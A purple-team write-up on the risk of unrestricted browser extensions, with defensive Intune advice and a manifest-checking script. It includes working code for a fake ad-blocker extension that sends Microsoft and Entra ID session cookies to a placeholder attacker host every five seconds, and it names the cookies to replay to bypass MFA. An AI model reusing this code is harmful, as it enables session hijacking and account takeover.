Chrome Ad Block Extension

Turns out, unrestricted extensions are just malware with better public perception.

During the purple team exercise, it was identified that the current endpoint policies allow users to install browser extensions without requiring administrative approval. This configuration significantly increases the organization’s exposure to risk, as adversaries can leverage malicious extensions to capture credentials, monitor user activity, or exfiltrate sensitive data without triggering immediate security controls.

Proof of Concept: "YouTube Ads Blocker" (Malicious Chrome Extension)

A PoC extension was developed to demonstrate the risk, performing the following actions:

  • Entra ID Account Theft

    • Exfiltrates session cookies to a remote server.

    • Harvests browsing history and sends it to an attacker-controlled server.

Detection Challenges

  • AV/EDR Evasion

    • Extension files are not flagged as malicious.

    • Executes under a trusted browser process (chrome.exe).

  • Lack of User Warnings

    • Browsers like Chrome place responsibility on users for extension risks, with no security prompts.

Coding the extension

The journey began by identifying that computers allowed the installation and use of untrusted Chrome extensions, either from the Chrome Web Store or local files. This discovery led to the development of a custom Chrome extension leveraging Chrome’s documented APIs to interact with the browser.

background.js

async function sendToken(cookie) {
  let exfilUrl = "http://IP:PORT/steal";

  fetch(exfilUrl, {
    method: "POST",
    headers: {
      "Content-Type": "application/json", // Ensure JSON format
    },
    body: JSON.stringify({
      domain: cookie.domain,
      name: cookie.name,
      value: cookie.value,
    }),
  })
    .then((response) => response.text())
    .then((text) => console.log(`[+] Server Response: ${text}`)) // Debug response
    .catch((error) => console.error(`[-] Fetch Error: ${error}`));
}
async function stealMicrosoftCookies() {
  let domains = [
    ".microsoft.com",
    ".login.microsoftonline.com",
    ".outlook.com",
    "outlook.office.com",
    ".teams.microsoft.com",
  ];

  for (let domain of domains) {
    chrome.cookies.getAll({ domain: domain }, (cookies) => {
      cookies.forEach(sendToken);
    });
  }
}

// Run every 5 seconds
setInterval(stealMicrosoftCookies, 5000);

manifest.json

Upon installing the extension in the Chrome browser, it displays as below.

At this point, the extension fetches the session cookies for Microsoft login.microsoft.com and sends them to a remote server as JSON over an HTTPS channel, where an adversary reuses them for authentication without needing MFA approval.

The extension also includes an additional feature that exfiltrates browsing history data to a remote server. This lets an adversary profile the compromised browser and gather more information about the behavior of the target user and environment.

An attacker in possession of these session cookies could import them into an active browser session and immediately gain access to the associated ITWW accounts. For Entra ID-based accounts, this proof-of-concept required importing two specific cookies, ESTSAUTH and ESTSAUTHPERSISTENT, which together re-establish the authenticated session without requiring user credentials.

Recommendation

Intune provides a global extension management policy that can be used to prevent users from installing or running untrusted browser extensions. This control helps ensure that only approved and security-vetted extensions are available within the organization's environment, reducing the risk of unauthorized or unsafe extensions being introduced.
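Before an extension is allowlisted under such a policy, a reviewer can check its manifest for the permission combination this PoC relies on: the "cookies" permission together with host access to the identity domains, plus "history" and a background worker. The following is an added example, not code from the original write-up; the field names are Chrome's documented Manifest V3 keys, and the sample manifest is constructed here to mirror what a PoC like this one would have to declare.

```javascript
// Added example (not the original post's code): manifest triage before allowlisting.
const SENSITIVE = {
  cookies: "read cookies for matched hosts (session theft)",
  history: "read full browsing history",
  webRequest: "observe traffic for matched hosts",
  scripting: "inject code into matched pages",
};
// Identity-provider hosts the PoC targets; reach here is what turns
// the "cookies" permission into Entra ID session theft.
const IDENTITY_HOSTS = ["login.microsoftonline.com", "outlook.office.com", "teams.microsoft.com"];

// Does a Chrome match pattern (e.g. "*://*.microsoft.com/*") cover a host?
function patternCovers(pattern, host) {
  if (pattern === "<all_urls>") return true;
  const m = /^(\*|https?|wss?|ftp):\/\/([^/]+)\//.exec(pattern);
  if (!m) return false;
  const h = m[2];
  if (h === "*") return true;
  if (h.startsWith("*.")) return host === h.slice(2) || host.endsWith(h.slice(1));
  return h === host;
}

function triageManifest(manifest) {
  const perms = new Set([...(manifest.permissions || []), ...(manifest.optional_permissions || [])]);
  const hosts = [...(manifest.host_permissions || []), ...(manifest.optional_host_permissions || [])];
  // Manifest V2 put host patterns inside "permissions"; fold those in too.
  for (const p of perms) if (p === "<all_urls>" || p.includes("://")) hosts.push(p);
  const findings = [];
  for (const [name, why] of Object.entries(SENSITIVE)) if (perms.has(name)) findings.push(`permission ${name}: ${why}`);
  const reach = IDENTITY_HOSTS.filter((host) => hosts.some((p) => patternCovers(p, host)));
  if (reach.length) findings.push(`host access reaches identity domains: ${reach.join(", ")}`);
  if (perms.has("cookies") && reach.length) findings.push("HIGH: cookies + identity host access enables session cookie theft");
  if (manifest.background) findings.push("background worker: can run on a timer without any open tab");
  const risk = findings.some((f) => f.startsWith("HIGH")) ? "HIGH" : findings.length ? "REVIEW" : "LOW";
  return { risk, findings };
}

// Constructed sample mirroring what the write-up's PoC would need to declare.
const SAMPLE_MANIFEST = {
  manifest_version: 3, name: "YouTube Ads Blocker", version: "1.0",
  permissions: ["cookies", "history", "storage"],
  host_permissions: ["*://*.microsoft.com/*", "*://login.microsoftonline.com/*", "*://*.office.com/*"],
  background: { service_worker: "background.js" },
};
console.log(triageManifest(SAMPLE_MANIFEST)); // risk: "HIGH"
```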
